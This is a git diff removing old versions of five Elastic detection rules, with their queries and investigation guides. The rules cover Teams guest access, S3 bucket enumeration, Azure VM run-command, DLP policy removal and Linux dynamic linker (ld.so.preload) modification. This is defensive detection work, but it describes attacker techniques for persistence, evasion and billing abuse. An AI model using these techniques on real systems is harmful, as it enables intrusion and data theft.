a/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_207.json +++ /dev/null @@ -1,95 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when guest access is enabled in Microsoft Teams. Guest access in Teams allows people outside the organization to access teams and channels. An adversary may enable guest access to maintain persistence in an environment.", - "false_positives": [ - "Teams guest access may be enabled by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Teams Guest Access Enabled", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Teams Guest Access Enabled\n\nMicrosoft Teams allows organizations to collaborate with external users through guest access, facilitating communication and teamwork. However, adversaries can exploit this feature to gain persistent access to sensitive environments by enabling guest access without authorization. The detection rule monitors audit logs for specific configurations that indicate guest access has been enabled, helping identify unauthorized changes and potential security breaches.\n\n### Possible investigation steps\n\n- Review the audit logs to confirm the event.action \"Set-CsTeamsClientConfiguration\" was successfully executed with the parameter o365.audit.Parameters.AllowGuestUser set to True.\n- Identify the user account responsible for enabling guest access by examining the event logs for the user ID or account name associated with the action.\n- Check the user's activity history to determine if there are any other suspicious actions or patterns, such as changes to other configurations or unusual login times.\n- Investigate the context of the change by reviewing any related communications or requests that might justify enabling guest access, ensuring it aligns with organizational policies.\n- Assess the potential impact by identifying which teams and channels now have guest access enabled and evaluate the sensitivity of the information accessible to external users.\n- Contact the user or their manager to verify if the change was authorized and necessary, and document their response for future reference.\n\n### False positive analysis\n\n- Legitimate collaboration with external partners may trigger alerts when guest access is enabled for business purposes. To manage this, create exceptions for known and approved external domains or specific projects that require guest access.\n- Routine administrative actions by IT staff to enable guest access for specific teams or channels can be mistaken for unauthorized changes. Implement a process to log and approve such changes internally, and exclude these from triggering alerts.\n- Automated scripts or third-party applications that configure Teams settings, including guest access, might cause false positives. 
Identify and whitelist these scripts or applications to prevent unnecessary alerts.\n- Changes made during scheduled maintenance windows can be misinterpreted as unauthorized. Define and exclude these time periods from monitoring to reduce false positives.\n\n### Response and remediation\n\n- Immediately disable guest access in Microsoft Teams by updating the Teams client configuration to prevent unauthorized external access.\n- Conduct a thorough review of recent audit logs to identify any unauthorized changes or suspicious activities related to guest access settings.\n- Notify the security team and relevant stakeholders about the potential breach to ensure awareness and initiate further investigation.\n- Revoke any unauthorized guest accounts that have been added to Teams to eliminate potential persistence mechanisms.\n- Implement additional monitoring on Teams configurations to detect any future unauthorized changes to guest access settings.\n- Escalate the incident to the organization's incident response team for a comprehensive investigation and to determine if further containment actions are necessary.\n- Review and update access control policies to ensure that enabling guest access requires appropriate authorization and oversight.", - "query": "event.dataset:o365.audit and event.provider:(SkypeForBusiness or MicrosoftTeams) and\nevent.category:web and event.action:\"Set-CsTeamsClientConfiguration\" and\no365.audit.Parameters.AllowGuestUser:True and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/powershell/module/skype/get-csteamsclientconfiguration?view=skype-ps" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - }, - { - "ecs": false, - "name": "o365.audit.Parameters.AllowGuestUser", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "5e552599-ddec-4e14-bad1-28aa42404388", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Configuration Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "5e552599-ddec-4e14-bad1-28aa42404388_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5f0234fd-7f21-42af-8391-511d5fd11d5c_3.json b/packages/security_detection_engine/kibana/security_rule/5f0234fd-7f21-42af-8391-511d5fd11d5c_3.json deleted file mode 100644 index c573a5f25a7..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/5f0234fd-7f21-42af-8391-511d5fd11d5c_3.json +++ /dev/null @@ -1,85 +0,0 @@ -{ - "attributes": { - "author": [ 
- "Elastic" - ], - "description": "Identifies a high number of failed S3 operations from a single source and account (or anonymous account) within a short timeframe. This activity can be indicative of attempting to cause an increase in billing to an account for excessive random operations, cause resource exhaustion, or enumerating bucket names for discovery.", - "false_positives": [ - "Known or internal account IDs or automation" - ], - "from": "now-6m", - "language": "esql", - "license": "Elastic License v2", - "name": "AWS S3 Bucket Enumeration or Brute Force", - "note": "## Triage and analysis\n\n### Investigating AWS S3 Bucket Enumeration or Brute Force\n\nAWS S3 buckets can be be brute forced to cause financial impact against the resource owner. What makes this even riskier is that even private, locked down buckets can still trigger a potential cost, even with an \"Access Denied\", while also being accessible from unauthenticated, anonymous accounts. This also appears to work on several or all [operations](https://docs.aws.amazon.com/cli/latest/reference/s3api/) (GET, PUT, list-objects, etc.). Additionally, buckets are trivially discoverable by default as long as the bucket name is known, making it vulnerable to enumeration for discovery.\n\nAttackers may attempt to enumerate names until a valid bucket is discovered and then pivot to cause financial impact, enumerate for more information, or brute force in other ways to attempt to exfil data.\n\n#### Possible investigation steps\n\n- Examine the history of the operation requests from the same `source.address` and `cloud.account.id` to determine if there is other suspicious activity.\n- Review similar requests and look at the `user.agent` info to ascertain the source of the requests (though do not overly rely on this since it is controlled by the requestor).\n- Review other requests to the same `aws.s3.object.key` as well as other `aws.s3.object.key` accessed by the same `cloud.account.id` or `source.address`.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, or network administrator activity.\n- Examine the request parameters. These may indicate the source of the program or the nature of the task being performed when the error occurred.\n - Check whether the error is related to unsuccessful attempts to enumerate or access objects, data, or secrets.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the calling user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles? Are there any other alerts or signs of suspicious activity involving this instance?\n- Consider the time of day. 
If the user is a human (not a program or script), did the activity take place during a normal time of day?\n- Contact the account owner and confirm whether they are aware of this activity if suspicious.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- Verify the `source.address` and `cloud.account.id` - there are some valid operations from within AWS directly that can cause failures and false positives. Additionally, failed automation can also cause false positives, but should be identifiable by reviewing the `source.address` and `cloud.account.id`.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n- Check for PutBucketPolicy event actions as well to see if they have been tampered with.
While we monitor for denied, a single successful action to add a backdoor into the bucket via policy updates (however they got permissions) may be critical to identify during TDIR.\n\n", - "query": "from logs-aws.cloudtrail*\n| where event.provider == \"s3.amazonaws.com\" and aws.cloudtrail.error_code == \"AccessDenied\"\n// keep only relevant fields\n| keep tls.client.server_name, source.address, cloud.account.id\n| stats failed_requests = count(*) by tls.client.server_name, source.address, cloud.account.id\n // can modify the failed request count or tweak time window to fit environment\n // can add `not cloud.account.id in (KNOWN)` or specify in exceptions\n| where failed_requests > 40\n", - "references": [ - "https://medium.com/@maciej.pocwierz/how-an-empty-s3-bucket-can-make-your-aws-bill-explode-934a383cb8b1", - "https://docs.aws.amazon.com/cli/latest/reference/s3api/" - ], - "risk_score": 21, - "rule_id": "5f0234fd-7f21-42af-8391-511d5fd11d5c", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS S3", - "Resources: Investigation Guide", - "Use Case: Log Auditing", - "Tactic: Impact" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0040", - "name": "Impact", - "reference": "https://attack.mitre.org/tactics/TA0040/" - }, - "technique": [ - { - "id": "T1657", - "name": "Financial Theft", - "reference": "https://attack.mitre.org/techniques/T1657/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0007", - "name": "Discovery", - "reference": "https://attack.mitre.org/tactics/TA0007/" - }, - "technique": [ - { - "id": "T1580", - "name": "Cloud Infrastructure Discovery", - "reference": "https://attack.mitre.org/techniques/T1580/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0009", - "name": "Collection", - "reference": "https://attack.mitre.org/tactics/TA0009/" - }, - "technique": [ - { - "id": "T1530", - "name": "Data from Cloud Storage", - "reference": "https://attack.mitre.org/techniques/T1530/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 3 - }, - "id": "5f0234fd-7f21-42af-8391-511d5fd11d5c_3", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/60884af6-f553-4a6c-af13-300047455491_103.json b/packages/security_detection_engine/kibana/security_rule/60884af6-f553-4a6c-af13-300047455491_103.json deleted file mode 100644 index 486d3682b55..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/60884af6-f553-4a6c-af13-300047455491_103.json +++ /dev/null @@ -1,83 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies command execution on a virtual machine (VM) in Azure. A Virtual Machine Contributor role lets you manage virtual machines, but not access them, nor access the virtual network or storage account they\u2019re connected to. However, commands can be run via PowerShell on the VM, which execute as System. Other roles, such as certain Administrator roles may be able to execute commands on a VM as well.", - "false_positives": [ - "Command execution on a virtual machine may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Command execution from unfamiliar users or hosts should be investigated. 
If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Command Execution on Virtual Machine", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Command Execution on Virtual Machine\n\nAzure Virtual Machines (VMs) allow users to run applications and services in the cloud. While roles like Virtual Machine Contributor can manage VMs, they typically can't access them directly. However, commands can be executed remotely via PowerShell, running as System. Adversaries may exploit this to execute unauthorized commands. The detection rule monitors Azure activity logs for command execution events, flagging successful operations to identify potential misuse.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to identify the specific user or service principal that initiated the command execution event, focusing on the operation_name \"MICROSOFT.COMPUTE/VIRTUALMACHINES/RUNCOMMAND/ACTION\".\n- Check the event.outcome field to confirm the success of the command execution and gather details about the command executed.\n- Investigate the role and permissions of the user or service principal involved to determine if they have legitimate reasons to execute commands on the VM.\n- Analyze the context of the command execution, including the time and frequency of the events, to identify any unusual patterns or anomalies.\n- Correlate the command execution event with other logs or alerts from the same time period to identify any related suspicious activities or potential lateral movement.\n- If unauthorized access is suspected, review the VM's security settings and access controls to identify and mitigate any vulnerabilities or misconfigurations.\n\n### False positive analysis\n\n- Routine maintenance tasks executed by IT administrators can trigger the rule. To manage this, create exceptions for known maintenance scripts or scheduled tasks that are regularly executed.\n- Automated deployment processes that use PowerShell scripts to configure or update VMs may be flagged. Identify these processes and exclude them from the rule to prevent unnecessary alerts.\n- Security tools or monitoring solutions that perform regular checks on VMs might execute commands that are benign. Whitelist these tools by identifying their specific command patterns and excluding them from detection.\n- Development and testing environments often involve frequent command executions for testing purposes. 
Consider excluding these environments from the rule or setting up a separate monitoring policy with adjusted thresholds.\n- Ensure that any exclusion or exception is documented and reviewed periodically to maintain security posture and adapt to any changes in the environment or processes.\n\n### Response and remediation\n\n- Immediately isolate the affected virtual machine from the network to prevent further unauthorized command execution and potential lateral movement.\n- Review the Azure activity logs to identify the source of the command execution and determine if it was authorized or part of a larger attack pattern.\n- Revoke any unnecessary permissions from users or roles that have the ability to execute commands on virtual machines, focusing on those with Virtual Machine Contributor roles.\n- Conduct a thorough investigation of the executed commands to assess any changes or impacts on the system, and restore the VM to a known good state if necessary.\n- Implement additional monitoring and alerting for similar command execution activities, ensuring that any future unauthorized attempts are detected promptly.\n- Escalate the incident to the security operations team for further analysis and to determine if additional systems or data may have been compromised.\n- Review and update access control policies and role assignments to ensure that only necessary permissions are granted, reducing the risk of similar incidents in the future.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.COMPUTE/VIRTUALMACHINES/RUNCOMMAND/ACTION\" and event.outcome:(Success or success)\n", - "references": [ - "https://adsecurity.org/?p=4277", - "https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a", - "https://docs.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#virtual-machine-contributor" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "60884af6-f553-4a6c-af13-300047455491", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Log Auditing", - "Tactic: Execution", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "60884af6-f553-4a6c-af13-300047455491_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_207.json b/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_207.json deleted file mode 100644 index 5b3d52d8189..00000000000 --- 
a/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_207.json +++ /dev/null @@ -1,91 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when a Data Loss Prevention (DLP) policy is removed in Microsoft 365. An adversary may remove a DLP policy to evade existing DLP monitoring.", - "false_positives": [ - "A DLP policy may be removed by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Exchange DLP Policy Removed", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Exchange DLP Policy Removed\n\nData Loss Prevention (DLP) in Microsoft 365 Exchange is crucial for safeguarding sensitive information by monitoring and controlling data transfers. Adversaries may exploit this by removing DLP policies to bypass data monitoring, facilitating unauthorized data exfiltration. The detection rule identifies such actions by analyzing audit logs for specific events indicating successful DLP policy removal, thus alerting security teams to potential defense evasion tactics.\n\n### Possible investigation steps\n\n- Review the audit logs for the specific event.action \"Remove-DlpPolicy\" to identify the user account responsible for the action.\n- Check the event.outcome field to confirm the success of the DLP policy removal and gather additional context from related logs.\n- Investigate the user account's recent activities in Microsoft 365 to identify any other suspicious actions or anomalies.\n- Verify if the removed DLP policy was critical for protecting sensitive data and assess the potential impact of its removal.\n- Contact the user or their manager to confirm if the DLP policy removal was authorized and legitimate.\n- Examine any recent changes in permissions or roles for the user account to determine if they had the necessary privileges to remove the DLP policy.\n\n### False positive analysis\n\n- Routine administrative changes to DLP policies by authorized personnel can trigger alerts. To manage this, maintain a list of authorized users and correlate their activities with policy changes to verify legitimacy.\n- Scheduled updates or maintenance activities might involve temporary removal of DLP policies. Document these activities and create exceptions in the monitoring system for the duration of the maintenance window.\n- Automated scripts or third-party tools used for policy management can inadvertently trigger false positives. Ensure these tools are properly documented and their actions are logged to differentiate between legitimate and suspicious activities.\n- Changes in organizational policy or compliance requirements may necessitate the removal of certain DLP policies. 
Keep a record of such changes and adjust the monitoring rules to accommodate these legitimate actions.\n\n### Response and remediation\n\n- Immediately isolate the affected Microsoft 365 account to prevent further unauthorized actions and data exfiltration.\n- Review the audit logs to identify any additional unauthorized changes or suspicious activities associated with the account or related accounts.\n- Restore the removed DLP policy from a backup or recreate it based on the organization's standard configuration to re-enable data monitoring.\n- Conduct a thorough investigation to determine the scope of data exposure and identify any data that may have been exfiltrated during the period the DLP policy was inactive.\n- Escalate the incident to the security operations center (SOC) or incident response team for further analysis and to determine if additional containment measures are necessary.\n- Implement enhanced monitoring and alerting for similar events, focusing on unauthorized changes to security policies and configurations.\n- Review and strengthen access controls and permissions for accounts with the ability to modify DLP policies to prevent unauthorized changes in the future.", - "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Remove-DlpPolicy\" and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-dlppolicy?view=exchange-ps", - "https://docs.microsoft.com/en-us/microsoft-365/compliance/data-loss-prevention-policies?view=o365-worldwide" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "60f3adec-1df9-4104-9c75-b97d9f078b25", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Configuration Audit", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "60f3adec-1df9-4104-9c75-b97d9f078b25_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/640f79d1-571d-4f96-a9af-1194fc8cf763_4.json b/packages/security_detection_engine/kibana/security_rule/640f79d1-571d-4f96-a9af-1194fc8cf763_4.json deleted file mode 100644 index 3cc56a14d78..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/640f79d1-571d-4f96-a9af-1194fc8cf763_4.json +++ /dev/null @@ -1,129 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Detects the creation or modification of files related to the dynamic linker on Linux systems. 
The dynamic linker is a shared library that is used by the Linux kernel to load and execute programs. Attackers may attempt to hijack the execution flow of a program by modifying the dynamic linker configuration files.", - "from": "now-9m", - "index": [ - "logs-endpoint.events.file*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Dynamic Linker Creation or Modification", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Dynamic Linker Creation or Modification\n\nThe dynamic linker in Linux systems is crucial for loading shared libraries needed by programs at runtime. Adversaries may exploit this by altering linker configuration files to hijack program execution, enabling persistence or evasion. The detection rule identifies suspicious creation or renaming of these files, excluding benign processes and extensions, to flag potential threats.\n\n### Possible investigation steps\n\n- Review the file path involved in the alert to determine if it matches any of the critical dynamic linker configuration files such as /etc/ld.so.preload, /etc/ld.so.conf.d/*, or /etc/ld.so.conf.\n- Identify the process that triggered the alert by examining the process.executable field and verify if it is listed as a benign process in the exclusion list. If not, investigate the legitimacy of the process.\n- Check the file extension and file.Ext.original.extension fields to ensure the file is not a temporary or expected system file, such as those with extensions like swp, swpx, swx, or dpkg-new.\n- Investigate the process.name field to determine if the process is a known system utility like java, sed, or perl, and assess if its usage in this context is typical or suspicious.\n- Gather additional context by reviewing recent system logs and other security alerts to identify any related or preceding suspicious activities that might indicate a broader attack or compromise.\n\n### False positive analysis\n\n- Package management operations can trigger false positives when legitimate package managers like dpkg, rpm, or yum modify linker configuration files. To handle this, ensure these processes are included in the exclusion list to prevent unnecessary alerts.\n- System updates or software installations often involve temporary file modifications with extensions like swp or dpkg-new. Exclude these extensions to reduce false positives.\n- Automated system management tools such as Puppet or Chef may modify linker files as part of their configuration management tasks. Add these tools to the exclusion list to avoid false alerts.\n- Virtualization and containerization platforms like Docker or VMware may alter linker configurations during normal operations. Verify these processes and exclude them if they are part of routine system behavior.\n- Custom scripts or applications that use common names like sed or perl might be flagged if they interact with linker files. 
Review these scripts and consider excluding them if they are verified as safe.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized access or lateral movement by the adversary.\n- Review and restore the original dynamic linker configuration files from a known good backup to ensure the integrity of the system's execution flow.\n- Conduct a thorough scan of the affected system using updated antivirus and anti-malware tools to identify and remove any additional malicious software or scripts.\n- Analyze system logs and the process execution history to identify the source of the unauthorized changes and determine if any other systems may be compromised.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to assess the potential impact on the organization.\n- Implement additional monitoring on the affected system and similar systems to detect any future attempts to modify dynamic linker configuration files.\n- Review and update access controls and permissions to ensure that only authorized personnel have the ability to modify critical system files, reducing the risk of similar incidents in the future.", - "query": "file where host.os.type == \"linux\" and event.action in (\"creation\", \"rename\") and\nfile.path : (\"/etc/ld.so.preload\", \"/etc/ld.so.conf.d/*\", \"/etc/ld.so.conf\") and\nnot (\n process.executable in (\n \"/bin/dpkg\", \"/usr/bin/dpkg\", \"/bin/dockerd\", \"/usr/bin/dockerd\", \"/usr/sbin/dockerd\", \"/bin/microdnf\",\n \"/usr/bin/microdnf\", \"/bin/rpm\", \"/usr/bin/rpm\", \"/bin/snapd\", \"/usr/bin/snapd\", \"/bin/yum\", \"/usr/bin/yum\",\n \"/bin/dnf\", \"/usr/bin/dnf\", \"/bin/podman\", \"/usr/bin/podman\", \"/bin/dnf-automatic\", \"/usr/bin/dnf-automatic\",\n \"/bin/pacman\", \"/usr/bin/pacman\", \"/usr/bin/dpkg-divert\", \"/bin/dpkg-divert\", \"/sbin/apk\", \"/usr/sbin/apk\",\n \"/usr/local/sbin/apk\", \"/usr/bin/apt\", \"/usr/sbin/pacman\", \"/bin/podman\", \"/usr/bin/podman\", \"/usr/bin/puppet\",\n \"/bin/puppet\", \"/opt/puppetlabs/puppet/bin/puppet\", \"/usr/bin/chef-client\", \"/bin/chef-client\",\n \"/bin/autossl_check\", \"/usr/bin/autossl_check\", \"/proc/self/exe\", \"/dev/fd/*\", \"/usr/bin/pamac-daemon\",\n \"/bin/pamac-daemon\", \"/usr/lib/snapd/snapd\", \"/usr/local/bin/dockerd\", \"/usr/libexec/platform-python\",\n \"/usr/lib/snapd/snap-update-ns\", \"/usr/bin/vmware-config-tools.pl\"\n ) or\n file.extension in (\"swp\", \"swpx\", \"swx\", \"dpkg-remove\") or\n file.Ext.original.extension == \"dpkg-new\" or\n process.executable : (\n \"/nix/store/*\", \"/var/lib/dpkg/*\", \"/snap/*\", \"/dev/fd/*\", \"/usr/lib/virtualbox/*\", \"/opt/dynatrace/oneagent/*\"\n ) or\n process.executable == null or\n process.name in (\n \"java\", \"executor\", \"ssm-agent-worker\", \"packagekitd\", \"crio\", \"dockerd-entrypoint.sh\",\n \"docker-init\", \"BootTimeChecker\"\n ) or\n (process.name == \"sed\" and file.name : \"sed*\") or\n (process.name == \"perl\" and file.name : \"e2scrub_all.tmp*\")\n)\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": false, - "name": "file.Ext.original.extension", - "type": "unknown" - }, - { - "ecs": true, - "name": "file.extension", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.name", - "type": "keyword" - }, - { - "ecs": true, - "name": 
"file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.executable", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "640f79d1-571d-4f96-a9af-1194fc8cf763", - "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1574", - "name": "Hijack Execution Flow", - "reference": "https://attack.mitre.org/techniques/T1574/", - "subtechnique": [ - { - "id": "T1574.006", - "name": "Dynamic Linker Hijacking", - "reference": "https://attack.mitre.org/techniques/T1574/006/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1574", - "name": "Hijack Execution Flow", - "reference": "https://attack.mitre.org/techniques/T1574/", - "subtechnique": [ - { - "id": "T1574.006", - "name": "Dynamic Linker Hijacking", - "reference": "https://attack.mitre.org/techniques/T1574/006/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 4 - }, - "id": "640f79d1-571d-4f96-a9af-1194fc8cf763_4", - "type": "security-rule" -} \ No newline at end of file diff --git 